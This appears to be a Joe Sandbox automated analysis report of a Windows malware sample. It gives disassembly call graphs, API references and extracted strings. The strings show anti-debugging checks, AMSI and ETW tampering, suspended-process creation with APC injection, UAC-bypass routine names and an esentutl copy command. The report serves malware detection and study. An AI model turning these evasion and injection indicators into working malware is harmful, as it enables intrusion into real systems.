                                                                                                                          • Part of subcall function 02D4F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02D4F77D
                                                                                                                          • Part of subcall function 02D37E5C: GetFileAttributesA.KERNEL32(00000000,?,02D5041F,ScanString,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,ScanString,02DB7380,02D5B7B8,UacScan,02DB7380,02D5B7B8,UacInitialize), ref: 02D37E67
                                                                                                                          • Part of subcall function 02D3C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02EAB8B8,?,02D50751,ScanBuffer,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,ScanBuffer,02DB7380,02D5B7B8,OpenSession), ref: 02D3C37B
                                                                                                                          • Part of subcall function 02D4DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D4DE40), ref: 02D4DDAB
                                                                                                                          • Part of subcall function 02D4DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02D4DE40), ref: 02D4DDDB
                                                                                                                          • Part of subcall function 02D4DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02D4DDF0
                                                                                                                          • Part of subcall function 02D4DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02D4DE1C
                                                                                                                          • Part of subcall function 02D4DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02D4DE25
                                                                                                                          • Part of subcall function 02D37E80: GetFileAttributesA.KERNEL32(00000000,?,02D5356F,ScanString,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,ScanBuffer,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,Initialize), ref: 02D37E8B
                                                                                                                          • Part of subcall function 02D38048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02D5370D,OpenSession,02DB7380,02D5B7B8,ScanString,02DB7380,02D5B7B8,Initialize,02DB7380,02D5B7B8,ScanString,02DB7380,02D5B7B8), ref: 02D38055
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                                                                        • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZER$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                        • API String ID: 297057983-2894825931
                                                                                                                        • Opcode ID: d423b3cb8f35e2ba4f745bbafb7b59abd8ca67871bc14da60a635d2fa783a99b
                                                                                                                        • Instruction ID: da06b1b35959623e79d843333d96462982fac0a52808d31efe47c35fa1962856
                                                                                                                        • Opcode Fuzzy Hash: d423b3cb8f35e2ba4f745bbafb7b59abd8ca67871bc14da60a635d2fa783a99b
                                                                                                                        • Instruction Fuzzy Hash: 21142F34A0426CCBDB52EB64DC80ADEB3BAFF95304F5040E6D409AB314DA74AE95DF61
                                                                                                                        Function 02D58128 Relevance: 163.8, APIs: 5, Strings: 87, Instructions: 2778processthreadCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 4574 2d58128-2d58517 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d348ec 4689 2d593a1-2d59524 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d348ec 4574->4689 4690 2d5851d-2d586f0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d347ec call 2d349a0 call 2d34d74 call 2d34df0 CreateProcessAsUserW 4574->4690 4779 2d59cf5-2d5b2fa call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 * 16 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d346d4 * 2 call 2d489d0 call 2d47c10 call 2d48338 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 ExitProcess 4689->4779 4780 2d5952a-2d59539 call 2d348ec 4689->4780 4799 2d586f2-2d58769 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 4690->4799 4800 2d5876e-2d58879 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 4690->4800 4780->4779 4788 2d5953f-2d59812 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d4f094 call 2d34860 call 2d349a0 call 2d346d4 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d37e5c 4780->4788 5046 2d59aef-2d59cf0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d349f8 call 2d48d70 4788->5046 5047 2d59818-2d59aea call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d4e358 call 2d34530 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34de0 * 2 call 2d34764 call 2d4dc8c 4788->5047 4799->4800 4900 2d58880-2d58ba0 call 2d349f8 call 2d4de50 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d4d164 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 4800->4900 4901 2d5887b-2d5887e 4800->4901 5216 2d58ba2-2d58bb4 call 2d48730 4900->5216 5217 2d58bb9-2d5939c call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 ResumeThread call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 CloseHandle call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d48080 call 2d4894c * 6 CloseHandle call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 4900->5217 4901->4900 5046->4779 5047->5046 5216->5217 5217->4689
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D489D0: FreeLibrary.KERNEL32(74FA0000,00000000,00000000,00000000,00000000,02DB738C,Function_0000662C,00000004,02DB739C,02DB738C,05F5E103,00000040,02DB73A0,74FA0000,00000000,00000000), ref: 02D48AAA
                                                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02EAB7E0,02EAB824,OpenSession,02DB7380,02D5B7B8,UacScan,02DB7380), ref: 02D586E9
                                                                                                                        • ResumeThread.KERNEL32(000008AC,ScanBuffer,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,UacScan,02DB7380,02D5B7B8,ScanBuffer,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8), ref: 02D58D33
                                                                                                                          • Part of subcall function 02D48730: NtQueueApcThread.NTDLL(?,?,?,?,?), ref: 02D48761
                                                                                                                        • CloseHandle.KERNEL32(000008A8,ScanBuffer,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,UacScan,02DB7380,02D5B7B8,000008AC,ScanBuffer,02DB7380,02D5B7B8,OpenSession,02DB7380), ref: 02D58EB2
                                                                                                                          • Part of subcall function 02D4894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02DB73A8,02D4A587,ScanString,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,Initialize,02DB73A8,02D4A93C,UacScan), ref: 02D48960
                                                                                                                          • Part of subcall function 02D4894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D4897A
                                                                                                                          • Part of subcall function 02D4894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02DB73A8,02D4A587,ScanString,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,Initialize), ref: 02D489B6
                                                                                                                        • CloseHandle.KERNEL32(000008A8,000008A8,ScanBuffer,02DB7380,02D5B7B8,UacInitialize,02DB7380,02D5B7B8,ScanBuffer,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,UacScan,02DB7380), ref: 02D592A4
                                                                                                                          • Part of subcall function 02D37E5C: GetFileAttributesA.KERNEL32(00000000,?,02D5041F,ScanString,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,ScanString,02DB7380,02D5B7B8,UacScan,02DB7380,02D5B7B8,UacInitialize), ref: 02D37E67
                                                                                                                          • Part of subcall function 02D4DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D4DD5E), ref: 02D4DCCB
                                                                                                                          • Part of subcall function 02D4DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D4DD05
                                                                                                                          • Part of subcall function 02D4DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D4DD32
                                                                                                                          • Part of subcall function 02D4DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D4DD3B
                                                                                                                          • Part of subcall function 02D48338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02D483C2), ref: 02D483A4
                                                                                                                        • ExitProcess.KERNEL32(00000000,OpenSession,02DB7380,02D5B7B8,ScanBuffer,02DB7380,02D5B7B8,Initialize,02DB7380,02D5B7B8,00000000,00000000,00000000,ScanString,02DB7380,02D5B7B8), ref: 02D5B2FA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseFileLibrary$CreateFreeHandlePathProcessThread$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcQueueResumeUserWrite
                                                                                                                        • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZER$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                        • API String ID: 2961332323-3516509641
                                                                                                                        • Opcode ID: 8c28d36919ca504d3a6b6c894111d743852a20e899c10096123b428d2e7ccf47
                                                                                                                        • Instruction ID: a05515ad74fcf36431cd4a891c44a9810900f5de4d29d20fb838be5f7046d8b9
                                                                                                                        • Opcode Fuzzy Hash: 8c28d36919ca504d3a6b6c894111d743852a20e899c10096123b428d2e7ccf47
                                                                                                                        • Instruction Fuzzy Hash: C0430A35A0426CDBCB12EB64DC809DEB3FAFF95344F5040E6E409AB314DA74AE958F61
                                                                                                                        Function 02D53E12 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2804sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D489D0: FreeLibrary.KERNEL32(74FA0000,00000000,00000000,00000000,00000000,02DB738C,Function_0000662C,00000004,02DB739C,02DB738C,05F5E103,00000040,02DB73A0,74FA0000,00000000,00000000), ref: 02D48AAA
                                                                                                                          • Part of subcall function 02D4DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D4DD5E), ref: 02D4DCCB
                                                                                                                          • Part of subcall function 02D4DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D4DD05
                                                                                                                          • Part of subcall function 02D4DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D4DD32
                                                                                                                          • Part of subcall function 02D4DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D4DD3B
                                                                                                                        • Sleep.KERNEL32(000003E8,ScanBuffer,02DB7380,02D5B7B8,UacScan,02DB7380,02D5B7B8,ScanString,02DB7380,02D5B7B8,02D5BB30,00000000,00000000,02D5BB24,00000000,00000000), ref: 02D540CB
                                                                                                                          • Part of subcall function 02D488B8: LoadLibraryW.KERNEL32(amsi), ref: 02D488C1
                                                                                                                          • Part of subcall function 02D488B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02D48920
                                                                                                                        • Sleep.KERNEL32(000003E8,ScanBuffer,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,UacScan,02DB7380,02D5B7B8,000003E8,ScanBuffer,02DB7380,02D5B7B8,UacScan,02DB7380), ref: 02D54277
                                                                                                                          • Part of subcall function 02D4894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02DB73A8,02D4A587,ScanString,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,Initialize,02DB73A8,02D4A93C,UacScan), ref: 02D48960
                                                                                                                          • Part of subcall function 02D4894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D4897A
                                                                                                                          • Part of subcall function 02D4894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02DB73A8,02D4A587,ScanString,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,Initialize), ref: 02D489B6
                                                                                                                        • Sleep.KERNEL32(00004E20,UacScan,02DB7380,02D5B7B8,ScanString,02DB7380,02D5B7B8,ScanBuffer,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,UacInitialize,02DB7380,02D5B7B8), ref: 02D550EE
                                                                                                                          • Part of subcall function 02D4DC04: RtlI.N(?,?,00000000,02D4DC7E), ref: 02D4DC2C
                                                                                                                          • Part of subcall function 02D4DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02D4DC7E), ref: 02D4DC42
                                                                                                                          • Part of subcall function 02D4DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02D4DC7E), ref: 02D4DC61
                                                                                                                          • Part of subcall function 02D37E5C: GetFileAttributesA.KERNEL32(00000000,?,02D5041F,ScanString,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,ScanString,02DB7380,02D5B7B8,UacScan,02DB7380,02D5B7B8,UacInitialize), ref: 02D37E67
                                                                                                                          • Part of subcall function 02D485BC: WinExec.KERNEL32(?,?), ref: 02D48624
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
